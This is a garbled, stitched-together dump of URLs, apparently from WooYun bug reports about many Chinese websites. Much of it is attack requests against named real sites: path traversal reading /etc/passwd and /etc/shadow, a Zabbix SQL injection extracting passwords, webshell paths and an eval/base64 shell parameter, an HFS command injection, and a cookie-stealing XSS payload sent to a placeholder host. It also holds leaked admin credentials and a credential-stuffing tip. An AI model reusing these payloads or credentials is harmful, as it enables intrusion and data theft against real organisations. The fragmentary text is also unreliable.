http://**.**.**.**/oa/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1&filters= http://**.**.**.**/oa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt 
http://**.**.**.**/heeroa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://**.**.**.**/sqoa//faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://**.**.**.**/swpuoa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://**.**.**.**:8080/heeroa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://2014.dfzq.com.cn/dfzq.tar.gz http://**.**.**.**:7001/index.jsp http://**.**.**.**:7001/indoc-cost.jsp?page=1&BH=01&MC=A http://**.**.**.**:7001/inhos-cost.jsp?page=1&BH=&MC=a http://**.**.**.**:7001/ylmedicine-price.jsp?bid=3&mid=15&id=3401 http://**.**.**.**:7001/csbg.jsp?txm=1111111&name=zhang http://**.**.**.**:7001/assayResult.jsp?txm=123&name=lisi http://**.**.**.**:7001/yxbg.jsp?txm=3333333&name=wangwu http://**.**.**.**:7001/medicine-price.jsp?page=1&BH=%C3%E2%BC%E5%D6%D0%D2%A9&MC=AA http://**.**.**.**:7001/indoc-cost.jsp?page=1&BH=01&MC=A http://**.**.**.**:7001/inhos-cost.jsp?page=1&BH=&MC=a http://**.**.**.**:7001/ylmedicine-price.jsp?bid=3&mid=15&id=3401 http://**.**.**.**:7001/csbg.jsp?txm=1111111&name=zhang http://**.**.**.**:7001/assayResult.jsp?txm=123&name=lisi http://**.**.**.**:7001/yxbg.jsp?txm=3333333&name=wangwu http://**.**.**.**:7001/medicine-price.jsp?page=1&BH=%C3%E2%BC%E5%D6%D0%D2%A9&MC=AA http://219.134.242.244:9200/ http://114.247.41.56:8080/index.html http://**.**.**.**/bugs/wooyun-2010-095995】,手头关于这套系统的洞一直没有提交,今天整理下所有打包提交wooyun http://**.**.**.**/ http://**.**.**.**/news/search.php http://**.**.**.**/search.php?u=76&k=2020 http://**.**.**.**/topic/index4.php?c=109736&t=31a http://**.**.**.**/more_a1.php?p=0&c=101007 http://**.**.**.**/detail_a1.php?c=101007&i=268620a http://**.**.**.**/newsmore.php?p=0&c=101002&u=76a http://**.**.**.**/newsdetail.php?c=101002&i=269162a 
http://**.**.**.**/ldxx.php?p=0&c=301101&u=76a http://**.**.**.**/zwmore.php?p=0&c=300342&u=73a http://**.**.**.**/news1more.php?p=0&c=212001a&u=73 http://**.**.**.**/news2more.php?p=0&c=212080a&u=73 http://**.**.**.**/bs1more.php?p=0&c=212011&u=73a http://**.**.**.**/bs2more.php?p=0&c=212021&u=73a http://**.**.**.**/bs3more.php?p=0&c=212034&u=73a http://**.**.**.**/bs4more.php?p=0&c=212045&u=73a http://**.**.**.**/kpmore.php?p=0&c=212055&u=73a http://**.**.**.**/jlmore.php?p=0&c=101007&u=73a http://**.**.**.**/aqmore.php?p=0&c=212061&u=73a http://**.**.**.**/jjmore.php?p=0&c=201210&u=58a http://**.**.**.**/dwmore.php?p=0&c=101201&u=58a http://**.**.**.**/dwdetail.php?c=101201&i=267951a http://**.**.**.**/zsdetail.php?c=301312&i=268300a http://**.**.**.**/zwdetail.php?c=300126&i=258484a http://**.**.**.**/bugs/wooyun-2010-095995 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/search.php?u=76&k=2020 http://**.**.**.**/topic/index4.php?c=109736&t=31a http://**.**.**.**/more_a1.php?p=0&c=101007a http://**.**.**.**/detail_a1.php?c=101007&i=268620a http://**.**.**.**/newsmore.php?p=0&c=101002&u=76a http://**.**.**.**/newsdetail.php?c=101002&i=269162a http://www.job168.com:80/ www.job168.com http://app2.yihaohuoche.com:8888/ http://app2.yihaohuoche.com:8888/wui/theme/ecology7/page/login.jsp?templateId=2 http://app2.yihaohuoche.com:8888/wui/theme/ecology7/page/login.jsp?templateId=2 http://app2.yihaohuoche.com:8888/wui/theme/ecology7/page/login.jsp?templateId=2 http://app2.yihaohuoche.com:8888/wui/theme/ecology7/page/login.jsp?templateId=2 http://so.cikuu.com/.svn/entries http://jf.ztgame.com/admin/login.php http://218.28.12.113:8088/ http://image.zol.com.cn/showpicture.php3?id=1159607&type=3 
http://image.zol.com.cn/showpicture.php3?id=1159607%27&type=3 http://moa.glsc.com.cn:8001/homepage.action http://www.wom186.com/ http://222.188.208.51:7001/ewac/login?_=1441798968891 http://222.188.208.51:7003/BanKloudServer/ http://222.188.208.52:7001/ecenter_hm/login http://www.kmw1.com/index.php?g=admin&m=index&a=loginpage http://www.ghhychina.cn:80/about/help/ty/ http://wzb.hebtu.edu.cn/admin/login.php http://wzb.hebtu.edu.cn/images/gundong/2015-09-08%20025058.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ== http://www.vogel.com.cn/news_view.html?id=484063 http://**.**.**.**/bugs/wooyun-2015-0139789/trace/17da959cabfccc1a28ded8846f9c749c http://**.**.**.**/Category_108/Index.aspx http://**.**.**.**:8080/nlcab/user!login.action http://kmw1.com/supplier/index.php?action=login http://www.leadong.com http://www.wooyun.org/corps/%E9%A2%86%E5%8A%A8 http://**.**.**.**/notesReport/ViewInformation.aspx?key=865 http://shanghu.manzuo.com/ http://infojiading.cn/weiweb/InfoList.asp?TParentColumnId=0000&TinforID=63 http://www.smeia.cn/ias/clt/main?fid=clt_Register&method=demo&fun=demo http://www.smeia.cn/ia/m.py?fid=private&tgt=Right&menu=private&sub1=view&upath=/../ http://www.smeia.cn/ia/main.py?fid=download&method=downfile&usr_id=demo@smeia.net&upath=/../../../../../../../../../etc/passwd http://www.smeia.cn/ia/m.py?fid=download&method=downfile&usr_id=demo@smeia.net&upath=/../../../../../../../../../var/named/ctc/master.yinfutong.com http://**.**.**.**/News_List.aspx?bid=23&sid=63 http://www.swsc.com.cn:8080//manage/upload/upload.html http://www.swsc.com.cn:8080/manage/upload/cmd.jsp http://oa.glsc.com.cn:10040/wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9QJ_89PTUFP_SEv0I_SizeGd3Rw8Tcx8DA3-jMAMDIz_T4ECD0GBjA19D_XCQZrN4AxzA0UDfD2FYQYaXBQCMXaXY/dl3/d3/L0lDUWtpQ1NTUW9LVVFBISEvb0lvZ0FFQ1FRREdJUXBURE9DNEpuQSEhLzRDd2lSLXJmbTE2SWt5WGlnRUEhLzdfQ0dBSDQ3TDAwTzJWMDAyTjVTUTBVUzMwRTQvd3BzLnBvcnRsZXRzLmxvZ2lu/ 
http://www.renrenle.cn/share/download.jsp?filePath=admin/upload/1342576091234.doc&fileName=1342576091234.doc http://www.renrenle.cn/share/download.jsp?filePath=../../../../../../../../../../../etc/shadow&fileName=shadow ws.war/WEB-INF/web.xml ws.war/WEB-INF/conf/app-context.xml ws.war/WEB-INF/sql.tld mpwx.war/WEB-INF/web.xml testws.war/WEB-INF/classes/conf/MallWSConfig.xml scm.war/WEB-INF/struts-config.xml scm.war/WEB-INF/classes/exportConfig.xml http://**.**.**.**/V2Conf/jsp/main/mainAction.do http://211.138.67.121:8000/spcheck/login.action http://itjuzi.com/user/edit/edit_basic_user http://www.changan-mazda.com.cn/news/index?year=2015 http://lbj.cikuu.com/ http://ks.mbachina.com/ucenter/exam/getQuesList http://1jiajie.com http://1jiajie.com/quickorder.html[下订单 http://1jiajie.com/login.html[登录 http://**.**.**.**/q_news_lt/nnq_news_list.jsp?id=b233 https://uniportal.huawei.com/uniportal/modifyInfo.do?actionFlag=toModifyPassword http://support.huawei.com/ecommunity/space/10000003 http://w3m.huawei.com/m/servlet/index?locale=zh_CN http://admin.1jiajie.com/stuff.html http://bjoffice.1jiajie.com/mrtg/203.100.81.90_eth0.html http://admin.1jiajie.com/400/d_face/l.php http://admin.1jiajie.com/400/d_face/u.html http://old.admin.1jiajie.com http://**.**.**.**/show_syfz.php?id=1301 http://blog.fund123.cn/,点击发表博文 http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191 http://f.quyiyuan.com/ http://qzlx.dlu.edu.cn/news.php?n_sel=0 http://qc.gcu.edu.cn/news_detail.asp?id=2510&bid=35&sid=42 http://qhzf.ncu.edu.cn/list.aspx?FCid=487FA71E&cid=F00514B2 http://ru.syau.edu.cn/other/n_show.asp?D_id=754 http://merchant2.ule.tom.com http://**.**.**.**/xyhdcont.php?id=5%20and%201=1 http://**.**.**.**/xyhdcont.php?id=5%20and%201=2 http://58.215.43.30 http://58.215.43.30/console/login/LoginForm.jsp http://mapi.alipay.com/gateway.do http://10.1.***31:9**0/com.guolian.esb.lifeinsurance.sms.syssendservice?wsdl http://10.6*********** 
http://touch.mescake.com:8082/.git/config http://card.yaic.com.cn//online/sale/card/checkAjax.do http://car.yaic.com.cn/ya/ inurl:site_item_content_2.php?site_map_item_id= http://**.**.**.**/site_item_content_2.php?site_map_item_id=361 http://**.**.**.**/ymca/site_item_content_2.php?site_map_item_id=54 http://**.**.**.**/site_item_content_2.php?site_map_item_id=414 http://**.**.**.**/huide_hosp/big5/site_item_content_2.php?site_map_item_id=24 http://**.**.**.**/site_item_content_2.php?site_map_item_id=171 http://**.**.**.**/tw/site_item_content_2.php?site_map_item_id=68 http://**.**.**.**/site_item_content_2.php?site_map_item_id=28 http://**.**.**.**/site_item_list_2.php?site_map_item_id=58 http://**.**.**.**/site_item_list_2.php?site_map_item_id=71 http://**.**.**.**/site_item_list_2.php?site_map_item_id=286 http://**.**.**.**/site_item_list_2.php?site_map_item_id=5 http://**.**.**.**/huide_hosp/big5/site_item_list_2.php?site_map_item_id=75 http://**.**.**.**/nursery/site_item_list_2.php?site_map_item_id=44 http://**.**.**.**/site_item_list_2.php?site_map_item_id=191 http://**.**.**.**/huide_hosp/big5/site_item_list_1.php?site_map_item_id=1 http://**.**.**.**/site_item_list_1.php?site_map_item_id=288 http://**.**.**.**/tw/site_item_list_1.php?topage=2&site_map_item_id=41 http://**.**.**.**/site_item_list_1.php?site_map_item_id=25 http://**.**.**.**/site_item_list_1.php?site_map_item_id=179 http://**.**.**.**/site_item_list_1.php?site_map_item_id=62 http://**.**.**.**/huide_hosp/big5/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/ymca/site_item_content_1.php?site_map_item_id=1 http://**.**.**.**/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/tw/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/site_item_content_1.php?site_map_item_id=95 
http://**.**.**.**/nursery/site_item_list_3.php?site_map_item_id=58&list_type=2 http://**.**.**.**/huide_hosp/big5/site_item_list_3.php?site_map_item_id=58&list_type=2 http://**.**.**.**/site2/yct/web/site_item_list_3.php?site_map_item_id=19 http://**.**.**.**/site_item_list_3.php?site_map_item_id=14 http://**.**.**.**/site_item_list_3.php?site_map_item_id=2 http://**.**.**.**/site_item_list_3.php?topage=2&site_map_item_id=18 http://**.**.**.**/tcc/site_item_content_5.php?site_map_item_id=167 http://**.**.**.**/huide_hosp/big5/site_item_content_5.php?site_map_item_id=88 http://**.**.**.**/site_item_content_5.php?site_map_item_id=179 http://**.**.**.**/site_item_content_5.php?site_map_item_id=414 http://**.**.**.**/site_item_content_5.php?site_map_item_id=28 http://www.jhxy.cn:7001/defaultroot/public/select_user/search_org_list.jsp?searchName=1 http://www.lavago.com/help/baodian.jsp?columnid=404 http://www.lavago.com/tour/ListPage.jsp?fi_ProjectId=9 http://kc.taotaosou.com/mgr/addUser/list.do http://www.risun.com:8888/ http://www.risun.com:8888/adminweb/Login.asp http://www.risun.com http://www.risun.com:8888 http://www.risun.com:9999/ http://piao.yododo.com/merchant/login.ydd http://www.jac.com.cn/jac_manager/login.do http://www.huxiu.com/user/logindo http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191 http://**.**.**.**/login.jsp http://61.55.141.68/login.jsp http://www.bbrcb.cn:7001/defaultroot/public/jsp/download.jsp?FileName=mailserver.properties&name=2.jsp&path=/../../config/ http://www.bbrcb.cn:7001/defaultroot/public/jsp/download.jsp?FileName=config.xml&name=govexchange.properties&path=/../../config/ http://www.bbrcb.cn:7001/defaultroot/public/jsp/download.jsp?FileName=config.xml&name=2.jsp&path=/../../config/ http://www.bbrcb.cn:7001/defaultroot/public/jsp/download.jsp?FileName=systemMark.properties&name=2.jsp&path=/../../config/ http://d.huxiu.com/ http://cgb2.fawcar.com.cn/QMDRP/qmfaces/drplogin.jsp 
http://css.midea.com.cn/ https://www.irongbei.com/index/alist?page=3&status=0&type=1 http://tg.feng.com/publication/publication/index_view?type_id=1&out=out http://tg.feng.com/static/kindeditor/php/file_manager_json.php?path=etc%2F&order=NAME&dir=image&1441849954812 http://222.169.184.113/ANDONSPS/ http://222.169.184.113/ascm/ http://222.169.184.113/LCDScreem/# http://hanlin.hbu.edu.cn:80/learn/asp/default.asp http://hanlin.hbu.edu.cn:80/ http://piao.yododo.com/merchant/login.ydd http://www.risun.com:8090/ http://www.risun.com:8090/adminweb/ http://**.**.**.**/NewsListShow.aspx?Pid=19 http://**.**.**.**/ShowUnits.aspx?UnitsId=20131007111013404089 http://pay.tgbus.com/interface/login.aspx?id=13 http://bbs.jjwxc.net/board.php?board=43&subid=0&page=1 http://202.121.96.144:8080/reader/login.php http://oa.china-sss.com/defaultroot/help/help_user.html http://putiancontainer.en.made-in-china.com/product/WbxQKkFuZYlC/China-Modular-Container-House-for-Labor-Accommodation.html http://**.**.**.**/html/list_594.html,在其中有管理按钮。 http://www.xj169.com http://hr.163.com:80/position/list.do?postType=01 http://hr.163.com:80/position/list.do?positionName=Java http://bbs.hongxiu.com/index.asp http://www.uhuibao.com/product/detail/?proid=79 http://www.uhuibao.com/yh/index/?aid=0&ytid=1&vid=0 http://www.uhuibao.com/ticket/result/?txtstartdate=2015-09-07&startstation=%E6%B7%B1%E5%9C%B3%E6%9C%BA%E5%9C%BA&endststion=%E5%B0%96%E6%B2%99%E5%92%80%28%E6%B5%B7%E6%B8%AF%E5%9F%8E%29 https://www.sf-ecs.com/ https://www.sf-ecs.com/security/login;jsessionid=E258DCB3D422595E9DEBE4EFE4EB944A http://doogua.dangdang.com/auth http://www.chinafair.org.cn http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=8 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=9 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=10 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=11 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=12 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=8000 
http://rjcoffice.ruijie.com.cn:20140/?search=={.exec|cmd.exe http://**.**.**.**/index.php?m=emotion&type=bbs http://www.uhuibao.com http://www.uhuibao.com/user/address/?opt=del&addid=20500 http://61.144.205.109 http://61.144.205.109/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/bugs/wooyun-2010-0118453 http://**.**.**.**/bugs/wooyun-2010-0118667 http://report.fyb365.com/reporter http://www.tujia.com/UserInfo/Orderinfo/903993/ http://www.tujia.com/UserInfo/Orderinfo/903993/查看订单详情,却还在。 http://**.**.**.**/login.aspx http://**.**.**.**/LoginXYX.aspx http://**.**.**.**/ http://**.**.**.**/LoginXYX.aspx http://**.**.**.**/DBMS/LBS_Manager/AddUserInfo.aspx?holdID=131424&userID=86652 http://**.**.**.**/login.aspx http://**.**.**.**/ uid:administrator pwd:Xtx52884866 http://www.taikejie.cn/web/LOGIN/index.html http://www.logistics.foxconn.com/OutBound/TrackingManage/Truck/EX_OT_InboundTruckDeclarationDetail.aspx?LoadingNO=S150706T001&pFlag=LoadingList http://www.baifeida.com/help.php?type=39 http://house.zhuji.net/rentlb.asp?community= http://xywy.zhuji.net/yszs/expert_online.php?type=data&uid=8535076&online=0&toa=1 http://hmc.zhuji.net/cnews.aspx?classid= http://**.**.**.**/ http://**.**.**.**/user/loginAction!initIndexStatic.action http://chat.hbblxk.com:8880/register.asp?roomid=1351 country:China http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo 
http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8081/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://suguovip.suguo.com.cn/Web/index.m http://suguovip.suguo.com.cn/Web/shopResult.m?regionId=null&type=null&shopType= http://service.zbintel.com/default.asp http://update.zbintel.com http://account.pcjoy.cn/login.htm http://**.**.**.**/member/ckOrderInfo.action http://www.cncbinternational.com/ http://203.174.49.153/ http://203.174.49.153/console/login/LoginForm.jsp http://servexpress.digitalchina.com/kuwei/login.aspx http://**.**.**.**/Administrator/admin_login.aspx http://servexpress.digitalchina.com/sms/DELL/fix/fixAllInfo.asp?fix_id=C506031201 www.91huayi.com http://w.189.cn/upload/images/20150812_145525307.jsp http://**.**.**.**/defaultroot/login.jsp?localeCode=zh_CN http://oa.tianya.cn/login/Login.jsp?logintype=1 http://oa.tianya.cn/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 http://www.airmedia.net.cn/hm/stations/52df5fb90a/index.php/52e0c7480a?id=9 https://vpn.airmedia.net.cn/ http://oa.airmedia.net.cn/login/Login.jsp www.kuxun.cn http://60.28.194.185/dashboard.php http://xinhun.li/ourwedding/cms/admin.php?mod=index&act=login,点击“注册”创建新的用户; http://itjuzi.com/company/26605 http://itjuzi.com/company/26605 vascript:win dow.lo cation .href='http://www.xxx.com/cookie.asp?msg='+do cument.co okie www.xxx.com代替! http://itjuzi.com/company/26605 www.xxx.com/cookie.asp换成自己服务器上获取cookie的asp的url地址! 
http://weixin.hazq.com http://house.cnfol.com/inner/RealEstate.shtml?name=%E9%98%B3%E5%85%89%E5%9F%8E%E9%87%91%E8%9E%8D%E8%A1%97%E5%AE%98%E9%82%B8&area=%E5%8F%B0%E6%B1%9F%E5%8C%BA&id=231 http://www.haodou.com/ http://211.151.151.208/dashboard.php http://zhidao.baidu.com/link?url=BB5-hfPXePKeO7TsCm5qiUQ8CPUYR3oF1Y-jbhhVXSLIyIkM9DU9Qzv8ZW6Z-2dLh4Qap6hpYlSRxQOxyhd1sK https://account.fund123.cn/login/ResetPassword/index.aspx http://**.**.** http://**.**.**.**/software/demo_page.php?cat_id=14 http://219.134.61.11:81/Login.jsp http://58.83.167.66/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://61.135.105.169:8081/114admin/login.html?redirect=true联通114116网上商城管理系统 http://qzlx.henu.edu.cn/feedback/index.php http://qzlx.henu.edu.cn/feedback/uploads/ http://qzlx.henu.edu.cn/feedback/uploads/2015_09_10_13_09_32_202.196.96.233_foote.php http://**.**.**.**/fzxx_detail.php?cid=&id=475 www.ciscostation.com.cn http://**.**.**.**/ http://180.169.36.120:7001/mbp/login.jsp http://180.169.36.120:7001/console/ http://180.169.36.120:7001/ma/ma1.jsp http://**.**.**.**:8080/index.php cn:82/index.php http://club.yuyue.com.cn:82/e-about.asp?id=350 http://**.**.**.**/renzhengjifeiguanli/ jdbc:oracle:thin:@**.**.**.**:1521:lgy http://219.141.167.56/index.php?m=company&f=browse http://**.**.**.**/Manage/Default.aspx http://agents.easou.com/ http://**.**.**.**/CmxDownload.php http://**.**.**.**/CmxDownload.php http://**.**.**.**:8088/CmxDownload.php http://**.**.**.**/CmxLogin.php http://**.**.**.**:8089/CmxLogin.php http://**.**.**.**:8000/CmxDownload.php http://**.**.**.**:808/CmxDownload.php http://kf.07073.com/company/member/skip http://**.**.**.**/bugs/wooyun-2015-0135197继这个 
http://221.8.57.98:7005/EbsWeb/getMyInsurance.do?UIAction=ClaimQueryCheck&type=queryClaim&entryID=null&areaCode=&customerCName=1&licenseNo=1&policyno=1&vinno=1 http://ess.cninsure.net http://ess.cninsure.net/product/common/cvar/CExec.jsp http://42.62.33.11/index.php http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1 http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set_submit.jsp?portlet_id=1 http://oa.guanhao.com:8080/kingdee/portal/portlet/document/view.jsp?portal_id=1&portlet_id=1 http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1 http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://202.202.43.244 http://222.177.140.97/ http://vlab.cqupt.edu.cn:8080 http://**.**.**.**/manage/news_list.asp?zhuid=11 http://**.**.**.**/onlinetest/show.asp?id=613 http://**.**.**.**/manage/news_showimg.asp?imgID=4463 http://admin.1jiajie.com/v2/ http://old.admin.1jiajie.com/ admin.1jiajie.com/v2/index.php?action=login&do=auth http://admin.1jiajie.com/stuff.html http://admin.1jiajie.com/400/d_face/l.php http://admin.1jiajie.com/400/d_face/u.html http://admin.1jiajie.com/400/d_face/face/13111111111.php http://122.96.51.14/C6V3/Jhsoft.Web.login/PassWordNew.aspx http://122.96.51.14/C6V3/Images/red/t.aspx http://www.yamaha-motor.com.cn/marine/boat/store_detail.php?id=7 
http://www.yamaha-motor.com.cn/marine/data/attachment/file/ http://www.agile.com.cn/agile/projectdetail/index.asp?id=15 http://kq.rthxchina.com:7070/Login.aspx http://wooyun.org/bugs/wooyun-2015-0139822 aspnet:MaxHttpCollectionKeys http://**.**.**.**/Product.aspx?p1=1 http://**.**.**.**/class.jsp?sid=79&sortid=103 http://218.84.62.118:8080/login http://oa.shpbs.com/member/MemberLogin.aspx,此处可撞库,遍历工号(格式如SH00688)后四位和弱口令123456即可获取十来个有效账号,登陆后可查看公司内部文件和通讯录(4000多名员工手机和邮箱)等内部信息。 http://bbs.g.letv.com https://**.**.**.**/grutz/h3c-pt-tools URL:http://app.wanda.cn/wanda3v/user/userinfo.html?vid=2a51f71011fc448cb186eb1958b0ec55&sysversion=5.1&devtype=1&appversion=3.0&userid=caodajun http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**,登录成功后打开地址 http://**.**.**.**/app/DBMS/LBS_Manager/AddAccount.aspx?KeyWord=1&HoldID=0 http://**.**.**.**/DBMS/AddHoldInfo.aspx?holdId=110098&parent=0 http://**.**.**.**/DBMS/LBS_Manager/AddUserInfo.aspx?ParentHoldID=1&holdID=115855&userID=71072 http://**.**.**.**/在运营商登录处登录 http://**.**.**.**/index.aspx http://**.**.**.**/ http://www.ciscostation.com.cn/index.jsp http://www.ciscostation.com.cn/NewsView.jsp?ID=3364 http://www.suningestate.com/ www.suningestate.com http://wap.1jiajie.com/ http://123.57.239.59/ admin:123456 http://www.haolyy.com/retail/58516?nid=bopu2015071106400978726500B60F http://www.namex.cn/HomeLink/OrderList.aspx http://doogua.dangdang.com/auth ID:Hyjal的帐号,数字ID520 http://222.223.188.223:7001/ http://222.223.188.223:7001/console/ http://222.223.188.223:7001/duo/2.jsp http://cbs.cninsure.net/ http://cbs.cninsure.net/logon/Login.jsp http://agency.1jiajie.com/ 
http://agency.1jiajie.com/v2/app/Static/upload/face/2015091109532755f234174a7a0.php http://ds34.digitalchina.com/HPISS/fix/sdar.aspx?bill_id=4751594513-471 http://www.ciscostation.com.cn/solutionview.jsp?ID=16 http://servexpress.digitalchina.com/sms/onlinetest/login.asp http://servexpress.digitalchina.com e6:76:68:81:17 http://www.ciscostation.com.cn/storiesview.jsp?ID=31 http://digitalmuseum.zju.edu.cn/jiaoyu.do?methede=morexinwen&newstype=news http://222.66.48.164:7001/console/login/LoginForm.jsp http://222.66.48.164:7001/ma/ma3.jsp http://**.**.**.**:8081/ http://**.**.**.**:8081 http://www.ciscostation.com.cn/ www.ciscostation.com.cn http://221.12.171.172:8024/hsicpweb/scmLoginManage.do?method=init http://60.191.25.162:8009/dashboard/tab/builds http://bc.ttnet.net/ http://60.191.25.162:8056/ http://**.**.**.**/phpadmin/ http://**.**.**.**/index.php?id=132 http://60.191.25.162:8085/login.jsp http://**.**.**.**/cas/login?service=http%3A%2F%2F**.**.**.**%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**/Login.jsp http://**.**.**.**:7070/Login.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**/cas/login?service=http%3A%2F%2F**.**.**.**%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**/denglu/denglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**/cas/login?service=http%3A%2F%2F**.**.**.**%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8091/Login.jsp 
http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://**.**.**.**:8090/cas/login?service=http%3A%2F%2F**.**.**.**%3A8090%2Fdenglu%2Fdenglulanmu.jsp http://d.huxiu.com/ http://adminx.huxiu.com/ http://**.**.**.**/news.asp?ItemID=262 http://m.wangpiao.com/wptouch/touch/orderDetail?check=0&OrderId=0025830008 http://www.wangpiao.com/company/company_introduce.html http://121.43.73.234:7001/trustWeb/login.jsp http://121.43.73.234:7001/console/ http://121.43.73.234:7001/ma/ma1.jsp http://www.1jiajie.com/quickorder.html?stype=3&slist=1 http://www.huxiu.com/group/thread/145055/1.html http://tengfu1319.69dai.com/mix/mixLogin?userName=13117619183&loginPassword=4297f44b13955235245b2497399d7a93&checkCode=7110&redirctUrl= http://www.69dai.com,自动登录 http://www.1jiajie.com/login.html www.1jiajie.com/ajaxCheckPromoCode.html http://www.1jiajie.com http://www.yunjiazheng.com/member/regshow http://**.**.**.**/bugs/wooyun-2015-0130475 http://**.**.**.**/ http://**.**.**.**/xzzf/admin/ http://119.147.86.247:8088/ http://**.**.**.**/show.asp?id=5969 www.dudujiaoche.com admin:htoa http://ids.suibe.edu.cn/amserver/UI/Login?gx_charset=UTF-8网站 http://open.iqiyi.com/developer/register/info/view http://oa.cnht.com.cn:9060 http://hr.cnht.com.cn:11000/ehr/login.jspa http://dev.koyimall.com/mall/view.html?cate=GD1H0A&seq=199721 http://115.28.63.116/index.php?g=home&m=zone&a=detail&zoneId=128 http://115.28.63.116/index.php?g=home&m=case&a=detail&caseid=1140 http://**.**.**.**/link?url=edvBocqiDXbNxrzGwbQXChJDGgNmk0RUiZA5ioTHbYRtnVfQeVeYYtHiRVZV8W6kFC_9c9Xhoa1GgZw0Vh9BxKdFUIW4mbEmLmiExQ38Tii http://old.admin.1jiajie.com http://servexpress.digitalchina.com/sms/DELL/wurnew/confirm_snap.asp?bill_id=D506184191 http://www.e-bridge.com.cn/news/showNewsDetail.do?oid=3203&sortid=8 http://www.ciscostation.com.cn/bbs/bbsplate.jsp?bankuai=3 http://baby.kangq.com/html/detail-42447*.html 